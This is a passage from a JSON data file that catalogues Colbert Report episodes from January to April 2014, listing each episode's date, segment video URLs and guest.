        "http://thecolbertreport.cc.com/videos/3nlrc7/new-jersey-bridge-scandal---damning-emails",
        "http://thecolbertreport.cc.com/videos/ez26gi/new-jersey-bridge-scandal---chris-christie-s-someone-else-a-culpa",
        "http://thecolbertreport.cc.com/videos/gvlcow/robert-gates-s--duty-",
        "http://thecolbertreport.cc.com/videos/cjww9c/jeff-skoll",
        "http://thecolbertreport.cc.com/videos/zmnwvz/sign-off---people-s-choice-award"
      ],
      "guest": "Jeff Skoll"
    },
    {
      "date": "2014-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qh2gll/intro---1-13-14",
        "http://thecolbertreport.cc.com/videos/nmeif6/water-crisis-in-west-virginia",
        "http://thecolbertreport.cc.com/videos/l6fcm2/the-word---never-ender-s-game",
        "http://thecolbertreport.cc.com/videos/ekq6m6/mirriad---retroactive-product-placement",
        "http://thecolbertreport.cc.com/videos/zf2igg/sign-off---back-scratch"
      ],
      "guest": "David Fanning"
    },
    {
      "date": "2014-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e0ksix/sport-report---baseball",
        "http://thecolbertreport.cc.com/videos/8aoa48/sport-report---winter-sports",
        "http://thecolbertreport.cc.com/videos/4lplhb/sport-report---billie-jean-king",
        "http://thecolbertreport.cc.com/videos/1urzjl/deborah-solomon",
        "http://thecolbertreport.cc.com/videos/b5df4x/sign-off---goodnight"
      ],
      "guest": "Deborah Solomon"
    },
    {
      "date": "2014-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/daejaf/ad-for-america",
        "http://thecolbertreport.cc.com/videos/bxdt1w/sport-report---uneducated-college-athletes---peyton-manning-s-sponsor-shout-out",
        "http://thecolbertreport.cc.com/videos/rbh95h/alpha-dog-of-the-week---francois-hollande",
        "http://thecolbertreport.cc.com/videos/tkqmyv/gabriel-sherman",
        "http://thecolbertreport.cc.com/videos/efgh7j/sign-off---goodnight"
      ],
      "guest": "Gabriel Sherman"
    },
    {
      "date": "2014-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pqopug/nsa-software-implants",
        "http://thecolbertreport.cc.com/videos/6omuyc/colbert-platinum---diamond-pacifiers---financial-domination",
        "http://thecolbertreport.cc.com/videos/d589xx/stephen-s-grammy-nomination---carol-burnett",
        "http://thecolbertreport.cc.com/videos/4g3c4f/naquasia-legrand",
        "http://thecolbertreport.cc.com/videos/h6vhef/sign-off---colbert-s-book-club"
      ],
      "guest": "Naquasia LeGrand"
    },
    {
      "date": "2014-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2jaqbf/intro---1-20-13",
        "http://thecolbertreport.cc.com/videos/6qy0qw/peyton-manning-s--omaha--chant---marijuana-s-effects-on-football",
        "http://thecolbertreport.cc.com/videos/bg48ms/the-word---thrift-justice",
        "http://thecolbertreport.cc.com/videos/1ah0qw/pope-francis-s-breastfeeding-support---affordable-sainthood",
        "http://thecolbertreport.cc.com/videos/szyyzo/scott-stossel",
        "http://thecolbertreport.cc.com/videos/3kds6e/sign-off---colbert-s-book-club-reminder"
      ],
      "guest": "Scott Stossel"
    },
    {
      "date": "2014-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6g3tkl/sign-off---colbert-s-book-club---ernest-hemingway-s--a-farewell-to-arms-",
        "http://thecolbertreport.cc.com/videos/27el91/colbert-s-book-club---mariel-hemingway-on-ernest-hemingway",
        "http://thecolbertreport.cc.com/videos/c8gx08/colbert-s-book-club---michael-chabon----a-farewell-to-arms-",
        "http://thecolbertreport.cc.com/videos/2tt8np/colbert-s-book-club---better-know-a-hemingway",
        "http://thecolbertreport.cc.com/videos/8vzg0l/colbert-s-book-club---ernest-hemingway"
      ],
      "guest": "Michael Chabon, Mariel Hemingway"
    },
    {
      "date": "2014-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o2dl8a/intro---1-22-14",
        "http://thecolbertreport.cc.com/videos/id8eug/mystery-doughnut-on-mars",
        "http://thecolbertreport.cc.com/videos/db8f37/tip-wag---air-force--dr--keith-ablow---westminster-dog-show",
        "http://thecolbertreport.cc.com/videos/wjov9z/tikker-death-watch",
        "http://thecolbertreport.cc.com/videos/y85ykp/charles-duhigg",
        "http://thecolbertreport.cc.com/videos/ihby00/sign-off---mutt"
      ],
      "guest": "Charles Duhigg"
    },
    {
      "date": "2014-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ay6diu/riots-in-the-ukraine",
        "http://thecolbertreport.cc.com/videos/nnj3ic/end-of-net-neutrality",
        "http://thecolbertreport.cc.com/videos/qatuhg/end-of-net-neutrality---tim-wu",
        "http://thecolbertreport.cc.com/videos/0i8pwp/china-s-colbert-report-rip-off",
        "http://thecolbertreport.cc.com/videos/fykny6/patricia-churchland",
        "http://thecolbertreport.cc.com/videos/5axbrg/sign-off---goodnight"
      ],
      "guest": "Patricia Churchland"
    },
    {
      "date": "2014-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qs3r6w/logo-restrictions-for-the-super-bowl",
        "http://thecolbertreport.cc.com/videos/51gnff/richard-sherman-s-rant-fallout",
        "http://thecolbertreport.cc.com/videos/mk6zsq/nate-silver",
        "http://thecolbertreport.cc.com/videos/c58bm1/sign-off---grammy-award"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2014-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gzw6pe/superb-owl-xlviii---nfl-extra-point-debate",
        "http://thecolbertreport.cc.com/videos/g3ng7g/fallback-position---championship-nfl-quarterback",
        "http://thecolbertreport.cc.com/videos/y1y1q6/spotted-owls-vs--barred-owls---david-yarnold",
        "http://thecolbertreport.cc.com/videos/wx55bg/justin-tuck",
        "http://thecolbertreport.cc.com/videos/q6n89x/sign-off---tootsie-pop"
      ],
      "guest": "Justin Tuck"
    },
    {
      "date": "2014-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/79qyj3/superb-owl-xlviii---football-christmas",
        "http://thecolbertreport.cc.com/videos/pzw1hz/fallback-position---championship-nfl-quarterback-pt--2",
        "http://thecolbertreport.cc.com/videos/0czypw/distractions---reactions-at-the-state-of-the-union",
        "http://thecolbertreport.cc.com/videos/6h1tef/cris-carter"
      ],
      "guest": "Cris Carter"
    },
    {
      "date": "2014-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vp5oqx/superb-owl-xlviii---football-health-concerns",
        "http://thecolbertreport.cc.com/videos/8z0t1l/superb-owl-xlviii---football-health-concerns---steve-fainaru---mark-fainaru-wada",
        "http://thecolbertreport.cc.com/videos/b88aif/big-game-debate-with-ed-murray-and-michael-hancock",
        "http://thecolbertreport.cc.com/videos/7aqq1s/drew-brees",
        "http://thecolbertreport.cc.com/videos/yucj0t/sign-off---football-toss"
      ],
      "guest": "Drew Brees"
    },
    {
      "date": "2014-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kmzt7v/coca-cola-s-diverse--america-the-beautiful--ad",
        "http://thecolbertreport.cc.com/videos/65qhlv/tip-wag---litigious-cheerleaders--pope-francis---china",
        "http://thecolbertreport.cc.com/videos/nezg8b/j-k--rowling-s-ron-and-hermione-bombshell",
        "http://thecolbertreport.cc.com/videos/nocpjv/jennifer-senior",
        "http://thecolbertreport.cc.com/videos/msb2vl/sign-off---goodnight"
      ],
      "guest": "Jennifer Senior"
    },
    {
      "date": "2014-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m0k7nu/black-history-of-children-s-dental-health-month---chris-christie-s-bridge-scandal-connection",
        "http://thecolbertreport.cc.com/videos/81q2jm/chris-christie-vs--david-wildstein-on-the-new-jersey-bridge-scandal",
        "http://thecolbertreport.cc.com/videos/49r39y/pussy-riot-pt--1",
        "http://thecolbertreport.cc.com/videos/08f0xw/pussy-riot-pt--2",
        "http://thecolbertreport.cc.com/videos/ubzb8b/sign-off---pussy-riot----bringing-human-rights-back-home-"
      ],
      "guest": "Pussy Riot"
    },
    {
      "date": "2014-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nn8d7g/intro---2-5-14",
        "http://thecolbertreport.cc.com/videos/w3uorg/obamacare-jobs-debate",
        "http://thecolbertreport.cc.com/videos/djw49l/america-s-wealthy-under-siege---mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/cjdkxj/lake-street-dive",
        "http://thecolbertreport.cc.com/videos/6itibl/sign-off---goodnight"
      ],
      "guest": "Lake Street Dive"
    },
    {
      "date": "2014-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tzqa3o/obama---the-keystone-xl-pipeline",
        "http://thecolbertreport.cc.com/videos/e3q55j/sochi-olympics-cry-athlon",
        "http://thecolbertreport.cc.com/videos/yzcp46/tip-wag---tsa-peeping-toms--domino-s-pizza-artists---federal-judges",
        "http://thecolbertreport.cc.com/videos/ze9n7p/paul-krugman",
        "http://thecolbertreport.cc.com/videos/1ur5x9/sign-off---welcome-baby-eli-"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2014-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/alv9kr/rocky-start-at-the-sochi-olympics",
        "http://thecolbertreport.cc.com/videos/155uge/sport-report---from-russia-with-love--but-no-gay-stuff-",
        "http://thecolbertreport.cc.com/videos/s385jl/taliban-dognappers",
        "http://thecolbertreport.cc.com/videos/hmu6hf/patrick-kennedy",
        "http://thecolbertreport.cc.com/videos/bl6jzi/sign-off---buddy-cole"
      ],
      "guest": "Patrick Kennedy"
    },
    {
      "date": "2014-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zddxmq/intro---2-11-14",
        "http://thecolbertreport.cc.com/videos/yesavg/blade-in-the-usa",
        "http://thecolbertreport.cc.com/videos/ow2caa/sport-report---from-russia-with-love--but-no-gay-stuff----u-s--speedskating-team",
        "http://thecolbertreport.cc.com/videos/cxui4b/sport-report---michael-sam-s-coming-out",
        "http://thecolbertreport.cc.com/videos/8yt2ar/charlie-crist",
        "http://thecolbertreport.cc.com/videos/v6h2iw/sign-off---goodnight"
      ],
      "guest": "Charlie Crist"
    },
    {
      "date": "2014-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mke8f4/white-house-state-dinner",
        "http://thecolbertreport.cc.com/videos/ngjlqq/bill-o-reilly-s-interview-of-the-decade",
        "http://thecolbertreport.cc.com/videos/f7yt2f/because-shep---white-house-menu-report",
        "http://thecolbertreport.cc.com/videos/zqevr4/godfrey-reggio",
        "http://thecolbertreport.cc.com/videos/wd8rlk/sign-off---au-revoir"
      ],
      "guest": "Godfrey Reggio"
    },
    {
      "date": "2014-02-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cb08sc/intro---2-18-14",
        "http://thecolbertreport.cc.com/videos/esabem/jimmy-fallon-s--tonight-show--debut",
        "http://thecolbertreport.cc.com/videos/icw75d/transgender-awareness",
        "http://thecolbertreport.cc.com/videos/px4k4w/transgender-awareness---janet-mock",
        "http://thecolbertreport.cc.com/videos/fpn2d7/brian-greene",
        "http://thecolbertreport.cc.com/videos/7cxypm/sign-off---goodnight"
      ],
      "guest": "Brian Greene"
    },
    {
      "date": "2014-02-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ht320/intro---2-19-14",        
        "http://thecolbertreport.cc.com/videos/z8viri/sport-report---from-russia-with-love--but-no-gay-stuff----buddy-cole-in-sochi",
        "http://thecolbertreport.cc.com/videos/k0fmq0/victory-and-vigilance-at-the-sochi-games",
        "http://thecolbertreport.cc.com/videos/pdgpm2/smile-file---al-qaeda-bomb-blunder",
        "http://thecolbertreport.cc.com/videos/80x11s/alexander-payne",
        "http://thecolbertreport.cc.com/videos/r3yso9/sign-off---goodnight"
      ],
      "guest": "Alexander Payne"
    },
    {
      "date": "2014-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gtx5i8/auction-for-bill-o-reilly-s-stolen-microwave",
        "http://thecolbertreport.cc.com/videos/7alqr9/sochi-olympics-2014---bode-miller",
        "http://thecolbertreport.cc.com/videos/i1pl20/stanley-mcchrystal",
        "http://thecolbertreport.cc.com/videos/3j3ziw/sign-off---microwave-auction---stanley-mcchrystal"
      ],
      "guest": "Gen. Stanley McChrystal"
    },
    {
      "date": "2014-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1x3cmv/intro---2-24-14",
        "http://thecolbertreport.cc.com/videos/dxcy1y/blade-in-the-usa---dutch-coach-s-anti-america-rant",
        "http://thecolbertreport.cc.com/videos/y1wxc3/crisis-in-ukraine",
        "http://thecolbertreport.cc.com/videos/8067fc/crisis-in-ukraine---gideon-rose",
        "http://thecolbertreport.cc.com/videos/2y58gs/darlene-love",        
        "http://thecolbertreport.cc.com/videos/illjzj/sign-off---remembering-harold-ramis"
      ],
      "guest": "Darlene Love"
    },
    {
      "date": "2014-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/blcgek/the-huffington-post-on-the-past-lives-of-children",
        "http://thecolbertreport.cc.com/videos/uov6m4/outrage-over-military-budget-cuts",
        "http://thecolbertreport.cc.com/videos/y2j7vo/the-word---jobsolete",
        "http://thecolbertreport.cc.com/videos/yw875l/consumers-for-paper-options",
        "http://thecolbertreport.cc.com/videos/w2zhlc/st--vincent"
      ],
      "guest": "St. Vincent"
    },
    {
      "date": "2014-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7vvoyf/michelle-obama-vs--child-obesity",
        "http://thecolbertreport.cc.com/videos/gs9vcz/colbert-s-very-wanted---who-took-gumby-",
        "http://thecolbertreport.cc.com/videos/y307f3/fox-news-on-hillary-clinton-s-age",
        "http://thecolbertreport.cc.com/videos/tb28zm/meryl-davis---charlie-white",
        "http://thecolbertreport.cc.com/videos/3w27qv/sign-off---chair-twirl"
      ],
      "guest": "Meryl Davis &amp; Charlie White"
    },
    {
      "date": "2014-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/11tivg/intro---2-27-14",
        "http://thecolbertreport.cc.com/videos/28qta1/defeat-for-arizona-s-anti-gay-legislation",
        "http://thecolbertreport.cc.com/videos/p8fj8f/black-history-month---stereotypes---racial-identity",
        "http://thecolbertreport.cc.com/videos/300ry4/black-history-month---laser-klan",
        "http://thecolbertreport.cc.com/videos/8ijgcp/jeff-goldblum",
        "http://thecolbertreport.cc.com/videos/axkpkj/sign-off---wedding-cake"
      ],
      "guest": "Jeff Goldblum"
    },
    {
      "date": "2014-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hbrhpe/magical-evening-at-the-2014-academy-awards",
        "http://thecolbertreport.cc.com/videos/q8u939/phony-obamacare-horror-stories",
        "http://thecolbertreport.cc.com/videos/8jpus1/phony-obamacare-horror-stories---patrick-stewart",
        "http://thecolbertreport.cc.com/videos/ysbw7d/sports-illustrated-barbie",
        "http://thecolbertreport.cc.com/videos/wwqhgn/caitlin-flanagan",
        "http://thecolbertreport.cc.com/videos/z2x5tb/sign-off----waiting-for-godot-"
      ],
      "guest": "Caitlin Flanagan"
    },
    {
      "date": "2014-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y4s2js/intro---3-4-14",
        "http://thecolbertreport.cc.com/videos/avavv1/better-know-a-geopolitical-flashpoint---crimean-peninsula",
        "http://thecolbertreport.cc.com/videos/r79jgq/cold-war-update---obama-s-ukraine-response",
        "http://thecolbertreport.cc.com/videos/dpc49v/arizona-s-religious-freedom-bill---self-professed-gays",
        "http://thecolbertreport.cc.com/videos/bjwnn1/jaron-lanier",
        "http://thecolbertreport.cc.com/videos/38n33x/sign-off---shoe-answering-machine"
      ],
      "guest": "Jaron Lanier"
    },
    {
      "date": "2014-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a2cnjz/intro---3-5-14",
        "http://thecolbertreport.cc.com/videos/chbquj/bill-o-reilly-on-the-downside-of-a-woman-president",
        "http://thecolbertreport.cc.com/videos/ak3veo/tip-wag---chevron---fda",
        "http://thecolbertreport.cc.com/videos/ppqf1u/headline-news-rebrand",
        "http://thecolbertreport.cc.com/videos/0exuju/beau-willimon",
        "http://thecolbertreport.cc.com/videos/gexopu/sign-off---goodnight"
      ],
      "guest": "Beau Willimon"
    },
    {
      "date": "2014-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mmf7np/intro---3-6-14",
        "http://thecolbertreport.cc.com/videos/te4fyy/legal-upskirting-in-massachusetts",
        "http://thecolbertreport.cc.com/videos/awc6am/women-s-history-month---impossible-body-standards---appetizing-beauty-products",
        "http://thecolbertreport.cc.com/videos/3si7rs/warner-music-s--happy-birthday--copyright",
        "http://thecolbertreport.cc.com/videos/f3jjle/theaster-gates",
        "http://thecolbertreport.cc.com/videos/g6qd4x/sign-off---liberty-bell"
      ],
      "guest": "Theaster Gates"
    },
    {
      "date": "2014-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ag9578/intro---3-10-14",
        "http://thecolbertreport.cc.com/videos/a6f94j/cross-controversy-at-9-11-museum",
        "http://thecolbertreport.cc.com/videos/bn0fy6/the-word---pew--pew--pew-",
        "http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1",
        "http://thecolbertreport.cc.com/videos/42g6iq/neil-degrasse-tyson-pt--2",
        "http://thecolbertreport.cc.com/videos/1bou2c/sign-off---goodnight"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2014-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g08oh5/intro---3-11-14",
        "http://thecolbertreport.cc.com/videos/usi00y/fan-magazine-for-pope-francis",
        "http://thecolbertreport.cc.com/videos/pis5qm/the-huffington-post-s-anal-sex-bombshell",
        "http://thecolbertreport.cc.com/videos/pvjhwj/the-huffington-post-s-anal-sex-bombshell---randy-ferrar",
        "http://thecolbertreport.cc.com/videos/qacc88/tip-wag---u-s--department-of-justice---wall-street",
        "http://thecolbertreport.cc.com/videos/nba46a/ronan-farrow",
        "http://thecolbertreport.cc.com/videos/hncfzx/sign-off---pope-centerfold"
      ],
      "guest": "Ronan Farrow"
    },
    {
      "date": "2014-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ut2zdq/president-obama-on--between-two-ferns-",
        "http://thecolbertreport.cc.com/videos/h6q3h4/vladimir-putin-s-propaganda-machine---russia-today",
        "http://thecolbertreport.cc.com/videos/i7q6ld/vladimir-putin-s-propaganda-machine---russia-today---liz-wahl",
        "http://thecolbertreport.cc.com/videos/wp6hv1/nsa-s--ask-zelda--advice-column",
        "http://thecolbertreport.cc.com/videos/2qsrw5/maria-shriver",
        "http://thecolbertreport.cc.com/videos/i6cs26/sign-off---goodnight"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2014-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5js43m/colorado-s-booming-marijuana-industry",
        "http://thecolbertreport.cc.com/videos/a1ejoq/bears---balls---ganjapreneurs",
        "http://thecolbertreport.cc.com/videos/xkuwmd/obama-s-overtime-pay-expansion",
        "http://thecolbertreport.cc.com/videos/k9goh1/simon-schama",
        "http://thecolbertreport.cc.com/videos/tl1mce/sign-off---goodnight"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2014-03-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hjb6kt/back-from-spring-break",
        "http://thecolbertreport.cc.com/videos/imczen/better-know-a-district---north-carolina-s-1st---g-k--butterfield",
        "http://thecolbertreport.cc.com/videos/8cy48v/malaysia-airlines--missing-plane",
        "http://thecolbertreport.cc.com/videos/g4poyv/bryan-cranston",
        "http://thecolbertreport.cc.com/videos/a2iw3f/sign-off---goodnight"
      ],
      "guest": "Bryan Cranston"
    },
    {
      "date": "2014-03-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9n1euv/hugely-historic-night-with-jimmy-carter",
        "http://thecolbertreport.cc.com/videos/0k0w7y/president-jimmy-carter---the-colbert-interviews",
        "http://thecolbertreport.cc.com/videos/xepzs5/jimmy-carter-pt--1",
        "http://thecolbertreport.cc.com/videos/t3jp2g/jimmy-carter-pt--2",
        "http://thecolbertreport.cc.com/videos/uyisf5/sign-off---goodnight--carter-library"
      ],
      "guest": "Jimmy Carter"
    },
    {
      "date": "2014-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zhwtt/drunk-secret-service-agents-in-amsterdam",
        "http://thecolbertreport.cc.com/videos/b6cwb3/sport-report---professional-soccer-toddler--golf-innovations---washington-redskins-charm-offensive",
        "http://thecolbertreport.cc.com/videos/q8pyub/bright-prospects-for-the-gop-in-2016",
        "http://thecolbertreport.cc.com/videos/mcpvbd/errol-morris",
        "http://thecolbertreport.cc.com/videos/ycwnol/sign-off---goodnight"
      ],
      "guest": "Errol Morris"
    },
    {
      "date": "2014-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qforig/intro---3-27-14",
        "http://thecolbertreport.cc.com/videos/uqmqua/ukraine-s-dolphin-army",
        "http://thecolbertreport.cc.com/videos/cabdj6/morning-news-for-millennials",
        "http://thecolbertreport.cc.com/videos/srj2lz/hawaii-s-prostitution-exemption-for-cops",
        "http://thecolbertreport.cc.com/videos/77oyfl/darren-aronofsky",
        "http://thecolbertreport.cc.com/videos/tyuheg/sign-off---playdate-with-charlie-rose"
      ],
      "guest": "Darren Aronofsky"
    },
    {
      "date": "2014-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lumbga/intro---3-31-14",
        "http://thecolbertreport.cc.com/videos/3yhe9h/emoji-ethnicity",
        "http://thecolbertreport.cc.com/videos/1zkr18/who-s-attacking-me-now-----cancelcolbert",
        "http://thecolbertreport.cc.com/videos/35dcpo/stephen-s--cancelcolbert-mea-culpa",
        "http://thecolbertreport.cc.com/videos/vj7n1j/biz-stone-pt--1",
        "http://thecolbertreport.cc.com/videos/yc8huq/biz-stone-pt--2",
        "http://thecolbertreport.cc.com/videos/adyesn/sign-off---bud-light-lime",
        "http://thecolbertreport.cc.com/videos/p65waq/3-31-14-in--60-seconds"
      ],
      "guest": "Biz Stone"
    },
    {
      "date": "2014-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ljnpx/obamacare-victory-lap",
        "http://thecolbertreport.cc.com/videos/cviqog/union-push-for-college-athletes",
        "http://thecolbertreport.cc.com/videos/64v4nu/union-push-for-college-athletes---ramogi-huma",
        "http://thecolbertreport.cc.com/videos/784uo8/john-malkovich",
        "http://thecolbertreport.cc.com/videos/rc1p9n/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/c9xd2d/4-1-14-in--60-seconds"
      ],
      "guest": "John Malkovich"
    },
    {
      "date": "2014-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxr7i2/u-n--climate-change-report",
        "http://thecolbertreport.cc.com/videos/o639ag/the-word---silent-but-deadly",
        "http://thecolbertreport.cc.com/videos/1ypxfz/silicon-valley-s-cosmetic-surgery-boom",
        "http://thecolbertreport.cc.com/videos/pnhs3f/dan-harris",
        "http://thecolbertreport.cc.com/videos/wrxyua/sign-off---comedy-central-app"
      ],
      "guest": "Dan Harris"
    },
    {
      "date": "2014-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kas793/holy-grail-discovery",
        "http://thecolbertreport.cc.com/videos/n79fg2/supreme-court-ruling-on-aggregate-campaign-funding",
        "http://thecolbertreport.cc.com/videos/n6lhb9/supreme-court-ruling-on-aggregate-campaign-funding---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/4vb00q/bill-o-reilly-s-defense-of-inequality",
        "http://thecolbertreport.cc.com/videos/fgsnrb/mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/255jt7/sign-off---coffee-break"
      ],
      "guest": "Mark Mazzetti"
    },
    {
      "date": "2014-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lz94c9/jeb-bush-on-illegal-immigrants",
        "http://thecolbertreport.cc.com/videos/jjifoz/tip-wag---new-york-times--alaska-board-of-game---mazda",
        "http://thecolbertreport.cc.com/videos/jvziju/matt-bevin-s-cockfighting-controversy",
        "http://thecolbertreport.cc.com/videos/xj9d66/edward-frenkel",
        "http://thecolbertreport.cc.com/videos/2dvxf1/sign-off---newspaper"
      ],
      "guest": "Edward Frenkel"
    },
    {
      "date": "2014-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m6pj8n/intro---4-8-14",
        "http://thecolbertreport.cc.com/videos/wpor0d/america-s-uninformed-opinion-on-ukraine",
        "http://thecolbertreport.cc.com/videos/ncl2k5/cia-interrogation-report",
        "http://thecolbertreport.cc.com/videos/nemi1a/common-core-confusion",
        "http://thecolbertreport.cc.com/videos/uyjkgv/jane-goodall",
        "http://thecolbertreport.cc.com/videos/2v7871/sign-off---cheers"
      ],
      "guest": "Jane Goodall"
    },
    {
      "date": "2014-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/53uymc/intro---4-9-14",
        "http://thecolbertreport.cc.com/videos/o3rniz/heartbleed-internet-bug",
        "http://thecolbertreport.cc.com/videos/8a5aao/brendan-eich-s-forced-resignation",
        "http://thecolbertreport.cc.com/videos/3pg0sn/brendan-eich-s-forced-resignation---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/l9zuu1/obama-s-equal-pay-orders",
        "http://thecolbertreport.cc.com/videos/wr794b/sheryl-sandberg",
        "http://thecolbertreport.cc.com/videos/mroadr/sign-off---goodnight"
      ],
      "guest": "Sheryl Sandberg"
    },
    {
      "date": "2014-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k436zi/david-letterman-s-retirement",
        "http://thecolbertreport.cc.com/videos/kv1taq/cheating-death---depression-edition",
        "http://thecolbertreport.cc.com/videos/3a9611/bill-o-reilly-on-america-s--grievance-industry-",
        "http://thecolbertreport.cc.com/videos/yi8cxa/sting"
      ],
      "guest": "Sting"
    },
    {
      "date": "2014-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1tyawq/intro---4-21-14",
        "http://thecolbertreport.cc.com/videos/0w61r2/al-qaeda-s-overly-public-pep-rally",
        "http://thecolbertreport.cc.com/videos/055g6r/hillary-clinton-s-grandmother-status",
        "http://thecolbertreport.cc.com/videos/7d5y74/stephen-colbert-s-bats--t-serious---hillary-clinton-shoe-spiracy-theory",
        "http://thecolbertreport.cc.com/videos/hls49q/extreme-measures-for-boosting-church-attendance",
        "http://thecolbertreport.cc.com/videos/p5o99a/ken-burns",
        "http://thecolbertreport.cc.com/videos/v2nud8/sign-off---goodnight"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2014-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t2msi7/intro---4-22-14",
        "http://thecolbertreport.cc.com/videos/1j1m90/postage-stamp-for-harvey-milk",
        "http://thecolbertreport.cc.com/videos/0bsy88/better-know-a-district---california-s-29th",
        "http://thecolbertreport.cc.com/videos/kg42wy/bad-news-for-ethanol-on-earth-day",
        "http://thecolbertreport.cc.com/videos/yeczpa/george-will",
        "http://thecolbertreport.cc.com/videos/0b7ymc/sign-off---goodnight"
      ],
      "guest": "George Will"
    },
    {
      "date": "2014-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vnbuc3/intro---4-23-14",
        "http://thecolbertreport.cc.com/videos/8l716g/canada-s-booming-middle-class",
        "http://thecolbertreport.cc.com/videos/tn3469/sport-report---snacks-for-students---cockfighting",
        "http://thecolbertreport.cc.com/videos/lz21l6/america-s-lime-crisis",
        "http://thecolbertreport.cc.com/videos/g5cgj8/john-calipari",
        "http://thecolbertreport.cc.com/videos/6glbo4/sign-off---goodnight"
      ],
      "guest": "John Calipari"
    },
    {
      "date": "2014-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2c27q9/supreme-court-affirmative-action-ruling",
        "http://thecolbertreport.cc.com/videos/ehanpl/the-ballad-of-cliven-bundy",
        "http://thecolbertreport.cc.com/videos/5mf7zk/phyllis-schlafly-vs--equal-pay-for-women",
        "http://thecolbertreport.cc.com/videos/ufdzm1/george-saunders",
        "http://thecolbertreport.cc.com/videos/vtuwb7/sign-off---country-boy"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2014-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6fq0xa/popechella",
        "http://thecolbertreport.cc.com/videos/yhq2cw/preventable-diseases-on-the-rise",
        "http://thecolbertreport.cc.com/videos/svsc0q/preventable-diseases-on-the-rise---paul-offit",
        "http://thecolbertreport.cc.com/videos/5my1ja/outrage-over-obama-s-bowing",
        "http://thecolbertreport.cc.com/videos/i1lidr/michael-mcfaul",
        "http://thecolbertreport.cc.com/videos/gu3d7a/sign-off----deadly-choices-"
      ],
      "guest": "Michael McFaul"
    },
    {
      "date": "2014-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cxn6h3/intro---4-29-14",
        "http://thecolbertreport.cc.com/videos/jfz395/donald-sterling-s-racist-comments",
        "http://thecolbertreport.cc.com/videos/td7npw/tip-wag---j-j--abrams---u-s--congress",
        "http://thecolbertreport.cc.com/videos/8pyjlg/clemency-push-for-drug-convicts",
        "http://thecolbertreport.cc.com/videos/eyae6k/robert-rodriguez",
        "http://thecolbertreport.cc.com/videos/11mf9t/sign-off---goodnight"
      ],
      "guest": "Robert Rodriguez"
    },
    {
      "date": "2014-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kdwdgq/intro---4-30-14",
        "http://thecolbertreport.cc.com/videos/6lmqu6/president-assad-s-reelection-bid",
        "http://thecolbertreport.cc.com/videos/so1kau/republican-advantage-in-the-2014-midterms",
        "http://thecolbertreport.cc.com/videos/2nuw76/republican-advantage-in-the-2014-midterms---clay-aiken",
        "http://thecolbertreport.cc.com/videos/tfpj0x/america-s-first-lesbian-throuple",
        "http://thecolbertreport.cc.com/videos/fs6gac/audra-mcdonald"
      ],
      "guest": "Audra McDonald"
